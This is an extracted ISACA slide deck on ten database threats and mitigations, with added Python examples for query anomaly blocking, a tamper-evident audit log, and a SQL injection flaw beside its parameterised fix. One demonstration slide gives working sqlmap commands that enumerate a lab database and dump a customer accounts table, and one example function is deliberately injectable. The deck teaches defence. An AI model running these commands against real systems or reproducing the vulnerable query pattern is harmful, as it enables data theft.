Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data

Page 1

© 2013 Imperva, Inc. All rights reserved.

Top 10 Database Threats

ISACA Charlotte Chapter

Confidential 1

Presented by Eric Gerena

Page 2

Agenda

Background

Top 10 Database Threats

Neutralizing the Threats

SQLi Attack Demonstration

Q&A

Page 3

Background

Page 4

What’s Changed?

Page 5

Top 10 Database Threats

Are you at risk?

Page 6

1. Excessive & Unused Privileges

Page 7

2. Privilege Abuse

Page 8

3. SQLi (SQL Injection)

Page 9

4. Malware

Page 10

5. Weak Audit Trail

Page 11

6. Storage Media Exposure

Page 12

7. Database Vulnerability Exploitation

Page 13

8. Unmanaged Sensitive Data

Page 14

9. Denial of Service (DoS)

Page 15

10. Limited Security Expertise & Education

Page 16

Neutralizing the Threats

Risk Mitigation

Page 17

How to Neutralize the Threats

Discover, Classify & Assess

User Rights Management

Auditing, Monitoring & Protecting

Data Protection

Non-Technical Security

Page 18

Discover, Classify & Assess

[Figure: rogue databases and sensitive data classes (SSN, Credit Cards, PII) are discovered and scored for Risk]

Discover Active DBs

Discover Rogue DBs

Classify DBs

Vulnerability Assessments

Page 19

User Rights Management

Reduce Unwarranted Data Access

Map Rights to Individuals

Identify Dormant Accounts

Enforce “Need-to-Know”

Comply

Page 20

Auditing, Monitoring & Protecting

[Figure: a statement "UPDATE orders set client ‘first…" issued by a network user, DBA or sysadmin is flagged as Unusual Activity; the monitoring layer can Allow or Block it, and here it is blocked]

Real Time Alerting & Blocking

Detect Unusual DB Activity

Monitor Local DB Activity

Impose Connection Controls
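The figure on this slide shows an UPDATE on the orders table, from an account that normally only reads it, being flagged as unusual and blocked. As an added example (not from the presentation or any Imperva product), the code below profiles which (statement type, table) pairs each account has issued from constructed audit lines, then classifies a new statement as allow or block; the log format, account names and the "DDL only from the dba role" policy are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample audit records (format and names invented for this example).
# They form the learning baseline for each account.
BASELINE_LOG = [
    "user=app_svc role=app stmt=SELECT * FROM orders WHERE id = 4711",
    "user=app_svc role=app stmt=SELECT * FROM orders WHERE id = 4712",
    "user=app_svc role=app stmt=INSERT INTO orders (id, client) VALUES (4713, 'acme')",
    "user=jsmith role=dba stmt=SELECT count(*) FROM orders",
    "user=jsmith role=dba stmt=ALTER TABLE orders ADD COLUMN note TEXT",
]

LINE_RE = re.compile(r"user=(\S+) role=(\S+) stmt=(.+)")
TABLE_RE = re.compile(r"\b(?:FROM|INTO|UPDATE|TABLE)\s+([A-Za-z_][A-Za-z0-9_]*)", re.I)
DDL_VERBS = {"ALTER", "DROP", "CREATE", "TRUNCATE"}

def parse(line):
    """Split one audit line into (user, role, verb, table)."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable audit line: {line!r}")
    user, role, stmt = m.groups()
    verb = stmt.split(None, 1)[0].upper()
    t = TABLE_RE.search(stmt)
    return user, role, verb, (t.group(1).lower() if t else None)

def build_baseline(lines):
    """Profile: the set of (verb, table) pairs each user has been seen issuing."""
    seen = defaultdict(set)
    for line in lines:
        user, _role, verb, table = parse(line)
        seen[user].add((verb, table))
    return seen

def classify(baseline, line):
    """Return ('allow', reason) or ('block', reason) for a new audit line.
    Two rules: DDL is only allowed from the dba role (a fixed policy, assumed
    here), and any (verb, table) pair the user has never issued before is
    treated as unusual activity."""
    user, role, verb, table = parse(line)
    if verb in DDL_VERBS and role != "dba":
        return "block", f"DDL ({verb}) from non-dba role {role}"
    if (verb, table) not in baseline.get(user, set()):
        return "block", f"{user} has not issued {verb} on {table} before"
    return "allow", "matches profile"
```

In a real deployment the baseline would be learned over a long window and reviewed by the DBA team before blocking is switched on, so that legitimate but rare statements are not dropped.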

Page 21

Data Protection

Tamper-Proof Audit Trail

Storage Encryption
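A tamper-proof audit trail, as listed above, is the mitigation for threat 5 (Weak Audit Trail). As an added example, not from the presentation or any Imperva product, here is one standard way to make a trail tamper-evident: each record is bound to the previous one with an HMAC under a key that is kept outside the database, so an administrator who can edit the audit table cannot re-sign it. The key, the record fields and the three sample events are constructed for the example.

```python
import hmac
import hashlib
import json

# Constructed key; in practice it lives in an HSM or on a host the DBA cannot
# reach, so that whoever can edit the audit table cannot also re-sign it.
AUDIT_KEY = b"example-key-not-for-production"
GENESIS = "0" * 64

def _mac(key, prev_mac, record):
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hmac.new(key, (prev_mac + body).encode(), hashlib.sha256).hexdigest()

def append_record(chain, record, key=AUDIT_KEY):
    """Append an audit record, binding it to the previous entry's MAC."""
    prev = chain[-1]["mac"] if chain else GENESIS
    chain.append({"record": record, "prev": prev, "mac": _mac(key, prev, record)})
    return chain

def verify_chain(chain, key=AUDIT_KEY):
    """Return -1 if every link checks out, else the index of the first bad entry.
    Detects edited, reordered or removed interior entries; truncation of the
    tail is only caught if the latest MAC is also anchored outside the DB."""
    prev = GENESIS
    for i, entry in enumerate(chain):
        if entry["prev"] != prev:
            return i
        if not hmac.compare_digest(_mac(key, prev, entry["record"]), entry["mac"]):
            return i
        prev = entry["mac"]
    return -1

def sample_chain():
    """Three constructed audit events, as a database audit layer would log them."""
    chain = []
    append_record(chain, {"ts": "2013-06-01T10:00:00Z", "user": "app_svc",
                          "stmt": "SELECT * FROM orders WHERE id = 4711"})
    append_record(chain, {"ts": "2013-06-01T10:00:05Z", "user": "jsmith",
                          "stmt": "UPDATE orders SET client = 'first'"})
    append_record(chain, {"ts": "2013-06-01T10:00:09Z", "user": "jsmith",
                          "stmt": "DELETE FROM audit_log WHERE user = 'jsmith'"})
    return chain
```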

Page 22

Non-Technical Security

User Education & Awareness

Cultivate Experienced Security Professionals

Page 23

Risk Reduction

[Chart: Risk Reduction by quarter, Q1-2013 through Q4-2013; series: Awareness, Audit, Vulnerabilities; vertical axis 0 to 35]

Page 24

SQLi Attack Demonstration

It still works!

Page 25

Anatomy of the Attack

Identify the Vulnerability

Exploit the Vulnerability

Compromi$e the Victim

Page 26

So, what tools will be used?

Identify the Vulnerability

Exploit the Vulnerability

Compromi$e the Victim

Commercial Web App Vulnerability Scanner

DB Exploit Tool "SQLMap"

Page 27

SQLMap Attack Commands

Identify All Databases and Current Database:
./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --dbs
./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --current-db

Identify Table(s) of Interest and Associated Columns:
./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db --tables
./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db -T Legacy_Customer_Accounts --columns

Dump Records from Identified Table and Columns:
./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db -T Legacy_Customer_Accounts --columns --dump >> /root/Desktop/SQLi-Attack-Results.txt
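The demo drives sqlmap through the ProdID parameter of proddetails.jsp. As an added example (not from the presentation or the demo application), here is the underlying defect and its fix in miniature: a lookup that concatenates ProdID into the SQL text beside one that validates the value and binds it as a parameter. The in-memory SQLite table and its rows are constructed for the example.

```python
import sqlite3

def make_catalogue():
    """Constructed in-memory product table standing in for the demo's catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (prod_id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "widget", 9.99), (2, "gadget", 19.99), (3, "gizmo", 29.99)])
    return conn

def product_details_vulnerable(conn, prod_id):
    """The defect sqlmap exploits: ProdID is pasted into the SQL text, so any
    SQL syntax it carries becomes part of the statement the database runs."""
    sql = "SELECT prod_id, name FROM products WHERE prod_id = " + prod_id
    return conn.execute(sql).fetchall()

def product_details_safe(conn, prod_id):
    """Fix: check the shape of the input, then bind it as a parameter so the
    database never parses it as SQL. Rejected input raises instead of querying."""
    if not prod_id.isdigit():
        raise ValueError("ProdID must be a positive integer")
    return conn.execute("SELECT prod_id, name FROM products WHERE prod_id = ?",
                        (int(prod_id),)).fetchall()
```

Parameter binding alone would already stop the injection; the input check on top gives the application a clean place to log and reject malformed requests, which is the signal a monitoring layer wants to see.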

Page 28

Off to the Black Market!

Page 29

Imperva

Data Security Solutions

Page 30

Imperva Highlights

About Imperva

Founded: 2002

CEO: Shlomo Kramer, Co-Founder of Check Point

HQ in Redwood Shores, CA

1,800+ customers; 25,000+ organizations

Customers in 50+ countries

The Problems We Solve

Protecting the Data that Drives Business

Maintaining Regulatory Compliance

Company Highlights

480+ Employees

$104M in Revenue

$48M Deferred Revenue

Cash & CE: $102M

Publicly Traded: IMPV

[Chart: revenue 2010 through 2013, 33% YoY Growth]

Page 31

The Solution

Solving the business security problem requires a new protection layer positioned closely around the data and applications in the data center.

[Diagram: actors around the data center: External Customers, Staff, Partners and Hackers on the outside; Internal Employees, Malicious Insiders and Compromised Insiders on the inside; Data Center Systems and Admins. The protection layer provides Tech. Attack Protection, Logic Attack Protection, Fraud Prevention, Usage Audit, User Rights Management and Access Control]

IMPERVA’S MISSION IS TO PROVIDE A COMPLETE SOLUTION

Page 32

Databases - Coverage

Coverage for Heterogeneous Databases

[Figure: supported database logos, including DB2, DB2 z/OS, DB2400, Informix, Netezza]

Page 33

Web Scanner Integration

Page 34

Thank You

Imperva Data Security Solutions